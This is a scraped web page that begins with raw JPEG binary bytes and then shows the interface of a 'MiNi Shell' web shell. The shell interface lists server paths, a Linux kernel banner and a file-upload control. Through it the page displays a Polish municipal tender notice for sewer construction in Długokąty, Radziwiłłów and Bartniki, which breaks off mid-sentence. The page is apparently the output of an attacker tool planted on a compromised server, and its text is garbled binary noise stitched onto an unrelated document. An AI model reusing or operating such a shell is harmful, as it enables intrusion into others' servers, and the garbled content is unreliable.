JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20250529/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20250529/0025357001-N-2025.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Budowa sieci kanalizacji sanitarnej w miejscowościach: Długokąty, Radziwiłłów oraz Bartniki. </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Gmina Puszcza Mariańska</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 750148390</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Stanisława Papczyńskiego 1</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Puszcza Mariańska</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">96-330</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">mazowieckie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL926 - Żyrardowski</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zam.publiczne@puszcza-marianska.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.puszcza-marianska.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Budowa sieci kanalizacji sanitarnej w miejscowościach: Długokąty, Radziwiłłów oraz Bartniki. </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-bafd4f37-9218-465a-9b3c-40c376bf0e33</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2025/BZP 00253570</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2025-05-29</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2025/BZP 00050007/03/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.2 Budowa sieci kanalizacji sanitarnej w miejscowościach: Radziwiłłów, Bartniki i Długokąty.</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://platformazakupowa.pl/transakcja/1118537 <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://platformazakupowa.pl/transakcja/1118537</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1.	Komunikacja w postępowaniu o udzielenie zamówienia w tym składanie ofert, wymiana informacji oraz przekazywanie dokumentów lub oświadczeń między Zamawiającym a Wykonawcą, z uwzględnieniem wyjątków określonych w ustawie Pzp., odbywa się przy użyciu środków komunikacji elektronicznej. Przez środki komunikacji elektronicznej rozumie się środki komunikacji elektronicznej zdefiniowane w ustawie z dnia 18 lipca 2002 r. o świadczeniu usług drogą elektroniczną (t.j. Dz. U. z 2024 r. poz. 1513 z późn. zm.).<br/>2.	Postępowanie prowadzone jest w języku polskim w formie elektronicznej za pośrednictwem platformazakupowa.pl pod adresem https://platformazakupowa.pl/transakcja/1118537<br/>3.	W celu skrócenia czasu udzielenia odpowiedzi na pytania, komunikacja między Zamawiającym a Wykonawcami w zakresie:<br/>a)	przesyłania Zamawiającemu pytań do treści SWZ;<br/>b)	przesyłania odpowiedzi na wezwanie Zamawiającego do złożenia podmiotowych środków dowodowych;<br/>c)	przesyłania odpowiedzi na wezwanie Zamawiającego do ułożenia, poprawienia, uzupełnienia oświadczenia, o którym mowa w art. 125 ust. 1, podmiotowych środków dowodowych, innych dokumentów lub oświadczeń składanych w postępowaniu;<br/>d)	przesyłania odpowiedzi na wezwanie Zamawiającego do złożenia wyjaśnień dotyczących treści oświadczenia, o którym mowa w art. 125 ust. 1 lub złożonych podmiotowych środków dowodowych lub innych dokumentów lub oświadczeń składanych w postępowaniu;<br/>e)	przysyłania odpowiedzi na wezwanie Zamawiającego do złożenia wyjaśnień dot. treści przedmiotowych środków dowodowych;<br/>f)	przesłania odpowiedzi na inne wezwania Zamawiającego wynikające z ustawy – Prawo zamówień publicznych;<br/>g)	przesyłania wniosków, informacji, oświadczeń Wykonawcy;<br/>h)	przesyłania odwołania, inne;<br/>odbywa się za pośrednictwem platformy zakupowej pod adresem<br/>https://platformazakupowa.pl/transakcja/1118537 prowadzonego postępowania i formularza „Wyślij wiadomość do zamawiającego”.<br/>Wymagania techniczne i organizacyjne dot. korespondencji elektronicznej zostały opisane w Rozdziale XIV SWZ</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">1.	Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o danych) (Dz. U. UE L119 z dnia 4 maja 2016 r., str. 1; zwanym dalej „RODO”) informujemy, że:<br/>1)	administratorem Pani/Pana danych osobowych jest Urząd Gminy w Puszczy Mariańskiej ul. Stanisława Papczyńskiego 1, 96-330 Puszcza Mariańska;<br/>2)	administrator wyznaczył Inspektora Danych Osobowych, z którym można się kontaktować pod adresem e-mail inspektor@cbi24.pl;<br/>3)	Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu związanym z przedmiotowym postępowaniem o udzielenie zamówienia publicznego, prowadzonym w trybie podstawowym o jakim stanowi art. 275 pkt 1 Pzp;<br/>4)	odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w oparciu o art. 74 ustawy Pzp;<br/>5)	Pani/Pana dane osobowe będą przechowywane, zgodnie z art. 78 ust. 1 Pzp przez okres 4 lat od dnia zakończenia postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy przekracza 4 lata, okres przechowywania obejmuje cały czas trwania umowy;<br/>6)	obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest wymogiem ustawowym określonym w przepisach ustawy Pzp, związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego;<br/>7)	w odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane w sposób zautomatyzowany, stosownie do art. 22 RODO;<br/>8)	posiada Pani/Pan:<br/>a)	na podstawie art. 15 RODO prawo dostępu do danych osobowych Pani/Pana dotyczących (w przypadku, gdy skorzystanie z tego prawa wymagałoby po stronie administratora niewspółmiernie dużego wysiłku może zostać Pani/Pan zobowiązana do wskazania dodatkowych informacji mających na celu sprecyzowanie żądania, w szczególności podania nazwy lub daty postępowania o udzielenie zamówienia publicznego lub konkursu albo sprecyzowanie nazwy lub daty zakończonego postępowania o udzielenie zamówienia);<br/>b)	na podstawie art. 16 RODO prawo do sprostowania Pani/Pana danych osobowych (skorzystanie z prawa do sprostowania nie może skutkować zmianą wyniku postępowania o udzielenie zamówienia publicznego ani zmianą postanowień umowy w zakresie niezgodnym z ustawą Pzp oraz nie może naruszać integralności protokołu oraz jego załączników);<br/>c)	na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem okresu trwania postępowania o udzielenie zamówienia publicznego lub konkursu oraz przypadków, o których mowa w art. 18 ust. 2 RODO (prawo do ograniczenia przetwarzania nie ma zastosowania w odniesieniu do przechowywania, w celu zapewnienia korzystania ze środków ochrony prawnej lub w celu ochrony praw innej osoby fizycznej lub prawnej, lub z uwagi na ważne względy interesu publicznego Unii Europejskiej lub państwa członkowskiego);<br/>d)	prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna Pani/Pan, że przetwarzanie danych osobowych Pani/Pana dotyczących narusza przepisy RODO;<br/>9)	nie przysługuje Pani/Panu:<br/>a)	w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych;<br/>b)	prawo do przenoszenia danych osobowych, o których mowa w art. 20 RODO;<br/>c)	na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c RODO;<br/>10) przysługuje Pani/Panu prawo wniesienia skargi do organu nadzorczego na niezgodne z RODO przetwarzanie Pani/Pana danych osobowych przez administratora. Organem właściwym dla przedmiotowej skargi jest Urząd Ochrony Danych Osobowych, ul. Stawki 2, 00-193 Warszawa.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">Z.271.6.2025</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">2</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> CZĘŚĆ I zamówienia pn.: „Budowa sieci kanalizacji sanitarnej w miejscowościach Długokąty i Radziwiłłów” obejmuje następujący zakres rzeczowy:<br/>1.1.	Budowę sieci kanalizacji sanitarnej w miejscowości Długokąty, w obrębie drogi gminnej nr 470245W położonej na działkach nr ew. 127 i 128.<br/>Zakres prac podstawowych związanych z budową sieci kanalizacji sanitarnej obejmuje: <br/>a)	budowa kanału z rur kanalizacyjnych o wydłużonych kielichach i pierścieniach stabilizujących PVC typu ciężkiego, o średnicy zewnętrznej 200 mm łączonych na wcisk, w ilości 359,00 m;<br/>b)	budowa odcinków przyłączeniowych z rur kanalizacyjnych o wydłużonych kielichach i pierścieniach stabilizujących PVC typu ciężkiego, o średnicy zewnętrznej 160 mm łączonych na wcisk, w ilości 96,50 m;<br/>c)	budowa kanału tłocznego z rur kanalizacyjnych PE o średnicy zewnętrznej 110 mm, w ilości 10,00 m;<br/>d)	budowa 8 szt. studni rewizyjnych z kręgów betonowych o średnicy 1200 mm, szczelnych łączonych na uszczelkę gumową, z pokrywą nadstudzienną i włazem drogowym Dn 600 mm typu ciężkiego 40t;<br/>e)	budowa studni rewizyjnych przyłączeniowych w technologii PE, PP o średnicy 200 mm, w ilości 28 szt.;<br/>f)	montaż trójników PVC o średnicy zewnętrznej 200 mm łączonych na wcisk, w ilości 24 szt.;<br/>g)	montaż korków i kolan PVC o średnicy zewnętrznej 160 mm łączonych na wcisk, w ilości 55 szt.;<br/>h)	układanie w wykopie rur ochronnych dwudzielnych z PCW o średnicy do 110 mm, w ilości 95 m;<br/>i)	układanie w wykopie rur ochronnych dwuzłącznych z PCW o średnicy do 250 mm, w ilości 6 m;<br/>j)	rozebranie i ponowne ułożenie nawierzchni z kostki kamiennej gr. 8 cm na podsypce cementowo-piaskowej, w ilości 28,00 m2;<br/>k)	budowa kompletnie wyposażonej betonowej przepompowni ścieków dn. 1200 mm i głębokości 5,00 m, wraz z rozdzielnicą zasilająco-sterującą;<br/>l)	wycięcie i rozebranie istniejącej nawierzchni bitumicznej drogi o grubości 8 cm (warstwa ścieralna gr. 4 cm i warstw wiążąca gr. 4 cm), rozebranie podbudowy z kamienia tłuczonego o grubości 20 cm i ponowne odtworzenie warstw nawierzchni drogowej, w ilości 1396,00 m2.<br/>1.2.	Budowę sieci kanalizacji sanitarnej w miejscowości Długokąty, w obrębie drogi wewnętrznej położonej na działkach nr ew. 127, 40/2, 40/5, 40/6, 41/6 i 309/8.<br/>Zakres prac podstawowych związanych z budową sieci kanalizacji sanitarnej obejmuje:<br/>a)	budowa kanału z rur kanalizacyjnych o wydłużonych kielichach i pierścieniach stabilizujących PVC typu ciężkiego, o średnicy zewnętrznej 200 mm łączonych na wcisk, w ilości 535,00 m;<br/>b)	budowa odcinków przyłączeniowych z rur kanalizacyjnych o wydłużonych kielichach i pierścieniach stabilizujących PVC typu ciężkiego, o średnicy zewnętrznej 160 mm łączonych na wcisk, w ilości 56,50 m;<br/>c)	budowa kanału tłocznego z rur kanalizacyjnych PE o średnicy zewnętrznej 110 mm, w ilości 10,00 m;<br/>d)	budowa 13 szt. studni rewizyjnych z kręgów betonowych o średnicy 1200 mm, szczelnych łączonych na uszczelkę gumową, z pokrywą nadstudzienną i włazem drogowym Dn 600 mm typu ciężkiego 40t;<br/>e)	budowa studni rewizyjnych przyłączeniowych w technologii PE, PP o średnicy 200 mm, w ilości 13 szt.;<br/>f)	montaż trójników PVC o średnicy zewnętrznej 200 mm łączonych na wcisk, w ilości 10 szt.;<br/>g)	montaż korków i kolan PVC o średnicy zewnętrznej 160 mm łączonych na wcisk, w ilości 42 szt.;<br/>h)	układanie w wykopie rur ochronnych dwudzielnych z PCW o średnicy do 110 mm, w ilości 12 m;<br/>i)	układanie w wykopie rur ochronnych dwuzłącznych z PCW o średnicy do 250 mm, w ilości 9 m;<br/>j)	rozebranie i ponowne ułożenie nawierzchni z kostki kamiennej gr. 8 cm na podsypce cementowo-piaskowej, w ilości 15,00 m2;<br/>k)	budowa kompletnie wyposażonej betonowej przepompowni ścieków dn. 1200 mm i głębokości 5,00 m, wraz z rozdzielnicą zasilająco-sterującą;<br/>l)	wycięcie i rozebranie istniejącej nawierzchni bitumicznej drogi o grubości 8 cm (warstwa ścieralna gr. 4 cm i warstw wiążąca gr. 4 cm), rozebranie podbudowy z kamienia tłuczonego o grubości 20 cm i ponowne odtworzenie warstw nawierzchni drogowej, w ilości 1 805,00 m2.<br/>1.3.	Budowę sieci kanalizacji sanitarnej w miejscowości Długokąty, w obrębie drogi gminnej nr 470245W położonej na działkach nr ew. 128 i 333.<br/>Zakres prac podstawowych związanych z budową sieci kanalizacji sanitarnej obejmuje:<br/>a)	budowa kanału z rur kanalizacyjnych o wydłużonych kielichach i pierścieniach stabilizujących PVC typu ciężkiego, o średnicy zewnętrznej 200 mm łączonych na wcisk, w ilości 50,00 m;<br/>b)	budowa odcinków przyłączeniowych z rur kanalizacyjnych o wydłużonych kielichach i pierścieniach stabilizujących PVC typu ciężkiego, o średnicy zewnętrznej 160 mm łączonych na wcisk, w ilości 13,00 m;<br/>c)	budowa 1 szt. studni rewizyjnej z kręgów betonowych o średnicy 1000 mm, szczelnych łączonych na uszczelkę gumową, z pokrywą nadstudzienną i włazem drogowym Dn 600 mm typu ciężkiego 40t;<br/>d)	budowa studni rewizyjnych przyłączeniowych w technologii PE,PP o średnicy 200 mm, w ilości 3 szt.;<br/>e)	montaż trójników PVC o średnicy zewnętrznej 200 mm łączonych na wcisk, w ilości 3 szt.;<br/>f)	montaż korków i kolan PVC o średnicy zewnętrznej 160 mm łączonych na wcisk, w ilości 12 szt.;<br/>g)	układanie w wykopie rur ochronnych dwudzielnych z PCW o średnicy do 110 mm, w ilości 9 m;<br/>h)	wycięcie i rozebranie istniejącej nawierzchni bitumicznej drogi o grubości 8 cm (warstwa ścieralna gr. 4 cm i warstw wiążąca gr. 4 cm), rozebranie podbudowy z kamienia tłuczonego o grubości 20 cm i ponowne odtworzenie warstw nawierzchni drogowej, w ilości 100,00 m2.<br/>1.4.	Budowę sieci kanalizacji sanitarnej w miejscowości Radziwiłłów, w obrębie dróg wewnętrznych – ulicy Złotej i ulicy Okopowej położonych na działkach nr ew. 296/6, 296/5 i 295/4.<br/>Zakres prac podstawowych związanych z budową sieci kanalizacji sanitarnej obejmuje:<br/>a)	budowa kanału z rur kanalizacyjnych o wydłużonych kielichach i pierścieniach stabilizujących PVC typu ciężkiego, o średnicy zewnętrznej 200 mm łączonych na wcisk, w ilości 141,00 m;<br/>b)	budowa odcinków przyłączeniowych z rur kanalizacyjnych o wydłużonych kielichach i pierścieniach stabilizujących PVC typu ciężkiego, o średnicy zewnętrznej 160 mm łączonych na wcisk, w ilości 32,50 m;<br/>c)	budowa 4 szt. studni rewizyjnych z kręgów betonowych o średnicy 1000 mm, szczelnych łączonych na uszczelkę gumową, z pokrywą nadstudzienną i włazem drogowym Dn 600 mm typu ciężkiego 40t;<br/>d)	budowa studni rewizyjnych przyłączeniowych w technologii PE,PP o średnicy 200 mm, w ilości 10 szt.;<br/>e)	montaż trójników PVC o średnicy zewnętrznej 200 mm łączonych na wcisk, w ilości 6 szt.;<br/>f)	montaż korków i kolan PVC o średnicy zewnętrznej 160 mm łączonych na wcisk, w ilości 31 szt.;<br/>g)	układanie w wykopie rur ochronnych dwudzielnych z PCW o średnicy do 110 mm, w ilości 15 m.<br/>Szczegółowy zakres rzeczowy przedmiotu zamówienia dla CZĘŚCI I określają: projekty budowlane stanowiące załączniki nr 7a, 7b, 7c i 7d do SWZ, projekty techniczne stanowiące załączniki nr 8a, 8b, 8c i 8d do SWZ, Specyfikacje Techniczne (STWIOR) stanowiące załączniki nr 9a, 9b, 9c i 9d do SWZ, przedmiary robót stanowiące załączniki nr 10a, 10b, 10c i 10d do SWZ oraz opinie geotechniczne stanowiące załączniki 11ac, 11b.<br/>Wykonawca zobowiązany jest zrealizować zamówienie dla CZĘŚCI I na zasadach i warunkach określonych we wzorze umowy stanowiącym Załącznik nr 6a do SWZ. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45200000-9 - Roboty budowlane w zakresie wznoszenia kompletnych obiektów budowlanych lub ich części oraz roboty w zakresie inżynierii lądowej i wodnej</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45230000-8 - Roboty budowlane w zakresie budowy rurociągów, linii komunikacyjnych i elektroenergetycznych, autostrad, dróg, lotnisk i kolei; wyrównywanie terenu</p> <p class="mb-0">45231000-5 - Roboty budowlane w zakresie budowy rurociągów, ciągów komunikacyjnych i linii energetycznych</p> <p class="mb-0">45231300-8 - Roboty budowlane w zakresie budowy wodociągów i rurociągów do odprowadzania ścieków</p> <p class="mb-0">45233000-9 - Roboty w zakresie konstruowania, fundamentowania oraz wykonywania nawierzchni autostrad, dróg</p> <p class="mb-0">45233142-6 - Roboty w zakresie naprawy dróg</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">12 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1.	Przy wyborze najkorzystniejszej oferty, Zamawiający będzie się kierował następującymi kryteriami oceny ofert dla każdej CZĘŚCI zamówienia oddzielnie:<br/>Kryterium nr 1 – Cena oferty brutto (C) – waga kryterium 60%,<br/>Kryterium nr 2 – Okres gwarancji (G) – waga kryterium 40%.<br/>2.	Zasady oceny ofert w poszczególnych kryteriach:<br/><br/>1)	Kryterium nr 1 – Cena oferty brutto (C) – waga 60%<br/>Punkty obliczane będą następująco:<br/><br/>C = cena najniższa brutto* / cena oferty ocenianej brutto x 100 pkt x 60%<br/>*spośród wszystkich złożonych ofert niepodlegających odrzuceniu<br/><br/>a)	Podstawą przyznania punktów w kryterium „Cena oferty brutto”, będzie cena ofertowa brutto podana przez Wykonawcę w „Formularzu ofertowym”.<br/>b)	Cena oferty brutto musi uwzględniać wszelkie koszty jakie Wykonawca poniesie w związku z realizacją przedmiotu zamówienia.<br/>c)	Liczba punktów możliwych do uzyskania – 60.<br/><br/>2)	Kryterium nr 2 – Okres gwarancji (G) – waga 40%<br/>Ocena oferty w kryterium gwarancji jakości wyrażona jest w punktach, które liczone będą następująco:<br/>a)	w ramach Kryterium nr 2, Zamawiający może przyznać maksymalnie 40 punktów,<br/>b)	za zadeklarowany przez wykonawcę okres gwarancji w swojej ofercie, Wykonawca otrzyma następującą punktację:<br/>36 miesięcy – 0 pkt<br/>48 miesięcy – 20 pkt<br/>60 miesięcy – 40 pkt<br/>c)	Wykonawca w formularzu ofertowym podaje okres gwarancji w pełnych miesiącach,<br/>d)	Wykonawca w formularzu ofertowym wpisuje jeden z wyżej wymienionych okresów 